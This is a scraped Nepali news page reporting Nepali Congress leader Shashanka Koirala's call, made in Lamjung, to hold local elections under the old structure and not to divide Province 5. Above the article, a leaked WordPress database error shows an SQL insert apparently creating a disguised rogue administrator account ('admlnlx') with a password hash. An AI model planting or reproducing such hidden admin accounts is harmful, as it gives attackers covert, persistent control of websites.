WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjVXc6.0hvo1cAAD7rmpvrkZWF/Wuo1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-27 17:34:45', '', 'admlnlx', 'admlnlx')
लमजुङ, माघ ५ –
नेपाली कांग्रेसका महामन्त्री डा.शशांक कोइरालाले पुरानै संरचनामा स्थानीय निर्वाचन गर्नुपर्ने बताएका छन् ।
लमजुङको सुन्दरबजारस्थित आदर्श बाल माध्यामिक विद्यालयको हीरकजयन्ती समारोहमा बुधबार बोल्दै कोइरालाले ‘एक वर्षभित्र सबै तहको निर्वाचन गराइसक्नुपर्ने भएकाले स्थानीय चुनाव पुरानै संरचनामा गर्नु उपयुक्त हुन्छ’–भने ।
स्थानीय निर्वाचनको तीनरचार महिनापछि प्रदेश र त्यसपछि संसदको निर्वाचन गर्नुपर्ने उनको सुझाव थियो ।स्थानीय जनताको भावनाविपरीत ५ नम्बर प्रदेश विभाजन गर्न नहुने पनि कोइरालाले बताए ।